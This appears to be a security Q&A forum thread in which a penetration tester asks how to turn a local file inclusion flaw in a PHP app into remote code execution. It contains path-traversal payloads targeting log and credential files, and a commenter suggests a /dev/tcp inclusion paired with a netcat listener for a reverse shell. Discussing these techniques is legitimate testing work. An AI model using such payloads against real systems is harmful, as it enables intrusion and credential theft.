# LFI to RCE when log file isn't readable

Tags: web-application, file-inclusion

During a penetration test, I came across an endpoint which lets me include local files and I can read `/etc/passwd`. However I don't have permissions to read `proc/self/environ` and `/etc/shadow`.

The endpoint looks like:

`http://xxxxx/directory/file.php?classes_dir=../../../../var/log/messages%00`
(Apache webserver running php on Ubuntu)

The payload above returns the following error message:

`Warning: require_once(../../../../var/log/messages) [function.require-once]: failed to open stream: Permission denied in /var/www/classes/file.php on line 4`

I can't read log files because I get `permission denied` message when I try accessing `/var/log/messages` ,( because of which log poisoning seems unlikely, in this case.)

The answer to [this](https://security.stackexchange.com/questions/11098/how-can-log-poisoning-be-successful-with-a-local-file-inclusion-attack) questions suggest looking into ssh logs, which isn't readable either.

Any ideas how this can be leveraged to RCE?

Comment: Another thing to try is `/dev/tcp/[your IP]/[listening port]`. Also try pulling down other PHP files and look for other vulnerabilities there.

Comment: You mean something like `http://xxxxx/file.php?classes_dir=../../../../dev/tcp/10.x.x.x/9999%00` and listening for reverse shell `nc -nlvp 9999` ?  (That didn't help)

Comment: Yes. It doesn't always work. It's just one of the things I try.

Comment: related: [How to hack linux via Local File Inclusion vulnerability?](https://security.stackexchange.com/questions/20004/how-to-hack-linux-via-local-file-inclusion-vulnerability).

Comment: I have this same problem in a pentest. Running a old Centos 5 (Final) with Apache 2.2.3 and PHP 5.1.6

Comment: did you ever try reading the php file themselves using the base64 encode